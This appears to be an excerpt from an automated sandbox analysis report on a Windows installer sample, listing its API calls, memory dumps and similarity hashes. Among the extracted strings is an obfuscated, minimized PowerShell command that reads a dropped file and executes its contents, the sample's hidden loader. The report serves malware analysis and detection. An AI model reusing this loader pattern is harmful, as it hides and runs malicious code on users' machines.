                                                                                                APIs
                                                                                                • SetFileAttributesA.KERNELBASE(00000000,?,000000F0), ref: 004015A0
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1352777190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1352758284.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352813944.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1355407410.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1355407410.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_ulf4JrCRk2.jbxd
                                                                                                Similarity
                                                                                                • API ID: AttributesFile
                                                                                                • String ID:
                                                                                                • API String ID: 3188754299-0
                                                                                                • Opcode ID: 517c991728b4920fe6c9b853d4cb973a6b5d17c3594e599704a440defafe000c
                                                                                                • Instruction ID: bed2877986d8c12a83e01492d596720214e57a472dec7050afa6ab6fccae40cd
                                                                                                • Opcode Fuzzy Hash: 517c991728b4920fe6c9b853d4cb973a6b5d17c3594e599704a440defafe000c
                                                                                                • Instruction Fuzzy Hash: 17D01277B08114E7DB00DBB5AE48A9E73A4FB50325F208637D111F11D0D3B98551A629
                                                                                                APIs
                                                                                                • SendMessageA.USER32(000103E4,00000000,00000000,00000000), ref: 0040404A
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1352777190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1352758284.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352813944.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1355407410.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1355407410.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_ulf4JrCRk2.jbxd
                                                                                                Similarity
                                                                                                • API ID: MessageSend
                                                                                                • String ID:
                                                                                                • API String ID: 3850602802-0
                                                                                                • Opcode ID: 875450fc840247aea6e73403ee44149e02d5474b467ece0a28835bfda1230da9
                                                                                                • Instruction ID: af7fd4c3fc1dda8ad1a195a9021ea177fcc43fc0d0bb539f8953ea950d20d41d
                                                                                                • Opcode Fuzzy Hash: 875450fc840247aea6e73403ee44149e02d5474b467ece0a28835bfda1230da9
                                                                                                • Instruction Fuzzy Hash: DFC09B717443007BEA31DB509D49F077758A750B00F5584357320F50D0C6B4F451D62D
                                                                                                APIs
                                                                                                • SendMessageA.USER32(00000028,?,00000001,00403E52), ref: 0040402F
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1352777190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1352758284.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352813944.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1355407410.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1355407410.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_ulf4JrCRk2.jbxd
                                                                                                Similarity
                                                                                                • API ID: MessageSend
                                                                                                • String ID:
                                                                                                • API String ID: 3850602802-0
                                                                                                • Opcode ID: 3bdb3c033a7d800f3f5983e71921b41162ac414239058931643885a1338ef954
                                                                                                • Instruction ID: 7b5ccc39adf6f72de5191684d4495c6b43ffe58f78915606d69c4a7e6f44d702
                                                                                                • Opcode Fuzzy Hash: 3bdb3c033a7d800f3f5983e71921b41162ac414239058931643885a1338ef954
                                                                                                • Instruction Fuzzy Hash: F3B092B5684200BAEE224B40DD09F457EA2E7A4702F008024B300240B0C6B200A1DB19
                                                                                                APIs
                                                                                                • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402EA4,?), ref: 004031DA
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1352777190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1352758284.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352813944.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1355407410.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1355407410.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_ulf4JrCRk2.jbxd
                                                                                                Similarity
                                                                                                • API ID: FilePointer
                                                                                                • String ID:
                                                                                                • API String ID: 973152223-0
                                                                                                • Opcode ID: 0070af3e33726fe8c9f5218e9eb5d27e4edbe1e9193197dd8736a9b9f47decae
                                                                                                • Instruction ID: 49fdcfdf8b1973cd13611e97ba0bfafd8618b6cb304eeeee9131019f9f046fb0
                                                                                                • Opcode Fuzzy Hash: 0070af3e33726fe8c9f5218e9eb5d27e4edbe1e9193197dd8736a9b9f47decae
                                                                                                • Instruction Fuzzy Hash: 03B01271644200BFDA214F00DF05F057B21A790700F10C030B748380F082712420EB4D
                                                                                                APIs
                                                                                                • KiUserCallbackDispatcher.NTDLL(?,00403DEB), ref: 00404018
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1352777190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1352758284.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352813944.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1355407410.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1355407410.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_ulf4JrCRk2.jbxd
                                                                                                Similarity
                                                                                                • API ID: CallbackDispatcherUser
                                                                                                • String ID:
                                                                                                • API String ID: 2492992576-0
                                                                                                • Opcode ID: caaff2729d3fe7bae5ae998927534049a5cfce9e2193b3926e4c56a419af128c
                                                                                                • Instruction ID: f87940b9544c4de7e657a104dd6f20edac94ef916c9b89b279468f5034d51d6a
                                                                                                • Opcode Fuzzy Hash: caaff2729d3fe7bae5ae998927534049a5cfce9e2193b3926e4c56a419af128c
                                                                                                • Instruction Fuzzy Hash: E2A01231404001DBCB014B10DF04C45FF21B7503007018030E50140034C6310420FF09
                                                                                                APIs
                                                                                                • GetDlgItem.USER32(?,000003F9), ref: 00404971
                                                                                                • GetDlgItem.USER32(?,00000408), ref: 0040497C
                                                                                                • GlobalAlloc.KERNEL32(00000040,?), ref: 004049C6
                                                                                                • LoadBitmapA.USER32(0000006E), ref: 004049D9
                                                                                                • SetWindowLongA.USER32(?,000000FC,00404F50), ref: 004049F2
                                                                                                • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404A06
                                                                                                • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404A18
                                                                                                • SendMessageA.USER32(?,00001109,00000002), ref: 00404A2E
                                                                                                • SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 00404A3A
                                                                                                • SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 00404A4C
                                                                                                • DeleteObject.GDI32(00000000), ref: 00404A4F
                                                                                                • SendMessageA.USER32(?,00000143,00000000,00000000), ref: 00404A7A
                                                                                                • SendMessageA.USER32(?,00000151,00000000,00000000), ref: 00404A86
                                                                                                • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404B1B
                                                                                                • SendMessageA.USER32(?,0000110A,00000003,00000000), ref: 00404B46
                                                                                                • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404B5A
                                                                                                • GetWindowLongA.USER32(?,000000F0), ref: 00404B89
                                                                                                • SetWindowLongA.USER32(?,000000F0,00000000), ref: 00404B97
                                                                                                • ShowWindow.USER32(?,00000005), ref: 00404BA8
                                                                                                • SendMessageA.USER32(?,00000419,00000000,?), ref: 00404CA5
                                                                                                • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00404D0A
                                                                                                • SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00404D1F
                                                                                                • SendMessageA.USER32(?,00000420,00000000,00000020), ref: 00404D43
                                                                                                • SendMessageA.USER32(?,00000200,00000000,00000000), ref: 00404D63
                                                                                                • ImageList_Destroy.COMCTL32(00000000), ref: 00404D78
                                                                                                • GlobalFree.KERNEL32(00000000), ref: 00404D88
                                                                                                • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00404E01
                                                                                                • SendMessageA.USER32(?,00001102,?,?), ref: 00404EAA
                                                                                                • SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 00404EB9
                                                                                                • InvalidateRect.USER32(?,00000000,00000001), ref: 00404ED9
                                                                                                • ShowWindow.USER32(?,00000000), ref: 00404F27
                                                                                                • GetDlgItem.USER32(?,000003FE), ref: 00404F32
                                                                                                • ShowWindow.USER32(00000000), ref: 00404F39
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1352777190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1352758284.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352813944.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1355407410.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1355407410.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_ulf4JrCRk2.jbxd
                                                                                                Similarity
                                                                                                • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                • String ID: $M$N
                                                                                                • API String ID: 1638840714-813528018
                                                                                                • Opcode ID: 053b7ab7fa00b04d0007377cc01b8b92edfe404da863458ea4911086e25be11d
                                                                                                • Instruction ID: 292d5c244ab645820c7f02bed8ff3f2a610eed88cba0887a0da166436049191d
                                                                                                • Opcode Fuzzy Hash: 053b7ab7fa00b04d0007377cc01b8b92edfe404da863458ea4911086e25be11d
                                                                                                • Instruction Fuzzy Hash: A10250B0900209AFEF109F54DC85AAE7BB5FB84315F10817AFA11B62E1D7789E42DF58
                                                                                                APIs
                                                                                                • GetDlgItem.USER32(?,000003FB), ref: 00404479
                                                                                                • SetWindowTextA.USER32(00000000,?), ref: 004044A3
                                                                                                • SHBrowseForFolderA.SHELL32(?,0041F0D0,?), ref: 00404554
                                                                                                • CoTaskMemFree.OLE32(00000000), ref: 0040455F
                                                                                                • lstrcmpiA.KERNEL32(004226A0,reckling: Installing), ref: 00404591
                                                                                                • lstrcatA.KERNEL32(?,004226A0), ref: 0040459D
                                                                                                • SetDlgItemTextA.USER32(?,000003FB,?), ref: 004045AF
                                                                                                  • Part of subcall function 004054E9: GetDlgItemTextA.USER32(?,?,00000400,004045E6), ref: 004054FC
                                                                                                  • Part of subcall function 00405F5C: CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\ulf4JrCRk2.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031EF,C:\Users\user\AppData\Local\Temp\,76F93410,004033C9), ref: 00405FB4
                                                                                                  • Part of subcall function 00405F5C: CharNextA.USER32(?,?,?,00000000), ref: 00405FC1
                                                                                                  • Part of subcall function 00405F5C: CharNextA.USER32(?,"C:\Users\user\Desktop\ulf4JrCRk2.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031EF,C:\Users\user\AppData\Local\Temp\,76F93410,004033C9), ref: 00405FC6
                                                                                                  • Part of subcall function 00405F5C: CharPrevA.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031EF,C:\Users\user\AppData\Local\Temp\,76F93410,004033C9), ref: 00405FD6
                                                                                                • GetDiskFreeSpaceA.KERNEL32(0041ECC8,?,?,0000040F,?,0041ECC8,0041ECC8,?,00000000,0041ECC8,?,?,000003FB,?), ref: 0040466A
                                                                                                • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404685
                                                                                                • SetDlgItemTextA.USER32(00000000,00000400,0041ECB8), ref: 004046FE
                                                                                                Strings
                                                                                                • C:\Users\user\AppData\Roaming\supersystem\panelet, xrefs: 0040457A
                                                                                                • reckling: Installing, xrefs: 00404527, 0040458A
                                                                                                • "Powershell.exe" -windowstyle minimized "$Hypnotizability77 = Get-Content -raw 'C:\Users\user\AppData\Roaming\supersystem\panelet\Nyslaaede.Skr' ; $Acrodynia=$Hypnotizability77.SubString(42735,3);.$Acrodynia($Hypnotizability77) , xrefs: 00404443
                                                                                                • A, xrefs: 0040454D
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1352777190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1352758284.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352813944.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1355407410.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1355407410.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_ulf4JrCRk2.jbxd
                                                                                                Similarity
                                                                                                • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpi
                                                                                                • String ID: "Powershell.exe" -windowstyle minimized "$Hypnotizability77 = Get-Content -raw 'C:\Users\user\AppData\Roaming\supersystem\panelet\Nyslaaede.Skr' ; $Acrodynia=$Hypnotizability77.SubString(42735,3);.$Acrodynia($Hypnotizability77) $A$C:\Users\user\AppData\Roaming\supersystem\panelet$reckling: Installing
                                                                                                • API String ID: 2246997448-2451307729
                                                                                                • Opcode ID: 476c68135541f7995d7e7312d009b35f143366a4d6393fc4d548ff83450bdccd
                                                                                                • Instruction ID: 255f07ea732f9d77aa63c61f9e9bd72d052a515538c5e386bff86aa800b3dd0f
                                                                                                • Opcode Fuzzy Hash: 476c68135541f7995d7e7312d009b35f143366a4d6393fc4d548ff83450bdccd
                                                                                                • Instruction Fuzzy Hash: 5A9172B1900219BBDB11AFA1CD85AAF76B8EF85304F10843BFB01B72D1D77C99418B69
                                                                                                APIs
                                                                                                • CoCreateInstance.OLE32(00407384,?,00000001,00407374,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 0040208B
                                                                                                • MultiByteToWideChar.KERNEL32(?,?,?,000000FF,?,00000400,?,00000001,00407374,?,?), ref: 00402143
                                                                                                Strings
                                                                                                • C:\Users\user\AppData\Roaming\supersystem\panelet, xrefs: 004020CB
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1352777190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1352758284.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352813944.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1355407410.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1355407410.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_ulf4JrCRk2.jbxd
                                                                                                Similarity
                                                                                                • API ID: ByteCharCreateInstanceMultiWide
                                                                                                • String ID: C:\Users\user\AppData\Roaming\supersystem\panelet
                                                                                                • API String ID: 123533781-2983365704
                                                                                                • Opcode ID: 844d7db231ce930ba87aa91d55221135eb66824421c535283c4cff4e72d9e9e5
                                                                                                • Instruction ID: 8923a1fbb4e768f6885cfedd98bdb4ab1c3b58066d3a845fdfa0f70482a78e56
                                                                                                • Opcode Fuzzy Hash: 844d7db231ce930ba87aa91d55221135eb66824421c535283c4cff4e72d9e9e5
                                                                                                • Instruction Fuzzy Hash: 02416D71A00209BFCB40DFA4CE88E9E7BB5BF48354B2042A9F911FB2D1D6799D41DB54
                                                                                                APIs
                                                                                                • CheckDlgButton.USER32(00000000,-0000040A,00000001), ref: 004041C0
                                                                                                • GetDlgItem.USER32(00000000,000003E8), ref: 004041D4
                                                                                                • SendMessageA.USER32(00000000,0000045B,00000001,00000000), ref: 004041F2
                                                                                                • GetSysColor.USER32(?), ref: 00404203
                                                                                                • SendMessageA.USER32(00000000,00000443,00000000,?), ref: 00404212
                                                                                                • SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 00404221
                                                                                                • lstrlenA.KERNEL32(?), ref: 00404224
                                                                                                • SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 00404233
                                                                                                • SendMessageA.USER32(00000000,00000449,?,00000110), ref: 00404248
                                                                                                • GetDlgItem.USER32(?,0000040A), ref: 004042AA
                                                                                                • SendMessageA.USER32(00000000), ref: 004042AD
                                                                                                • GetDlgItem.USER32(?,000003E8), ref: 004042D8
                                                                                                • SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 00404318
                                                                                                • LoadCursorA.USER32(00000000,00007F02), ref: 00404327
                                                                                                • SetCursor.USER32(00000000), ref: 00404330
                                                                                                • ShellExecuteA.SHELL32(0000070B,open,004226A0,00000000,00000000,00000001), ref: 00404343
                                                                                                • LoadCursorA.USER32(00000000,00007F00), ref: 00404350
                                                                                                • SetCursor.USER32(00000000), ref: 00404353
                                                                                                • SendMessageA.USER32(00000111,00000001,00000000), ref: 0040437F
                                                                                                • SendMessageA.USER32(00000010,00000000,00000000), ref: 00404393
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1352777190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1352758284.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352813944.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1355407410.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1355407410.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_ulf4JrCRk2.jbxd
                                                                                                Similarity
                                                                                                • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                                                                                • String ID: N$open
                                                                                                • API String ID: 3615053054-904208323
                                                                                                • Opcode ID: aa854a75b9a8ef41e2656ff54a1ab69c816baf86c41e2f577b142ace3155aca6
                                                                                                • Instruction ID: e12ca537bcd72e8a05bc460f10c87f41301461b9037796019f3247b39f6fe1bc
                                                                                                • Opcode Fuzzy Hash: aa854a75b9a8ef41e2656ff54a1ab69c816baf86c41e2f577b142ace3155aca6
                                                                                                • Instruction Fuzzy Hash: 9361A0B1A40209BFEB109F61DD45F6A7B69FB84704F108026FB04BB2D1C7B8A951CB99
                                                                                                APIs
                                                                                                • lstrcpyA.KERNEL32(00421A88,NUL,?,00000000,?,00000000,?,00405BCD,?,?,00000001,00405770,?,00000000,000000F1,?), ref: 00405A39
                                                                                                • CloseHandle.KERNEL32(00000000,00000000,00000000,00000001,?,00000000,?,00405BCD,?,?,00000001,00405770,?,00000000,000000F1,?), ref: 00405A5D
                                                                                                • GetShortPathNameA.KERNEL32(00000000,00421A88,00000400), ref: 00405A66
                                                                                                  • Part of subcall function 004058E7: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405B16,00000000,[Rename],00000000,00000000,00000000), ref: 004058F7
                                                                                                  • Part of subcall function 004058E7: lstrlenA.KERNEL32(00405B16,?,00000000,00405B16,00000000,[Rename],00000000,00000000,00000000), ref: 00405929
                                                                                                • GetShortPathNameA.KERNEL32(?,00421E88,00000400), ref: 00405A83
                                                                                                • wsprintfA.USER32 ref: 00405AA1
                                                                                                • GetFileSize.KERNEL32(00000000,00000000,00421E88,C0000000,00000004,00421E88,?,?,?,?,?), ref: 00405ADC
                                                                                                • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00405AEB
                                                                                                • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000), ref: 00405B23
                                                                                                • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,00000000,00421688,00000000,-0000000A,004093A0,00000000,[Rename],00000000,00000000,00000000), ref: 00405B79
                                                                                                • WriteFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00405B8B
                                                                                                • GlobalFree.KERNEL32(00000000), ref: 00405B92
                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00405B99
                                                                                                  • Part of subcall function 00405982: GetFileAttributesA.KERNELBASE(00000003,00402CBC,C:\Users\user\Desktop\ulf4JrCRk2.exe,80000000,00000003), ref: 00405986
                                                                                                  • Part of subcall function 00405982: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 004059A8
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1352777190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1352758284.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352813944.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1355407410.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1355407410.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_ulf4JrCRk2.jbxd
                                                                                                Similarity
                                                                                                • API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizeWritewsprintf
                                                                                                • String ID: %s=%s$NUL$[Rename]
                                                                                                • API String ID: 1265525490-4148678300
                                                                                                • Opcode ID: f37ac594430da83018f04a4547826f7a07ed016582ff29ad24a376af527490d1
                                                                                                • Instruction ID: b425f8375b2a923a6c6e646106298c69547d2110189afc57e8bc93149b7758b2
                                                                                                • Opcode Fuzzy Hash: f37ac594430da83018f04a4547826f7a07ed016582ff29ad24a376af527490d1
                                                                                                • Instruction Fuzzy Hash: 2D41EE71A04A15AFD2206B219C49F6B3A6CDF45725F14013ABE06F62D2DA7CB8008E7D
                                                                                                APIs
                                                                                                • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                • GetClientRect.USER32(?,?), ref: 0040105B
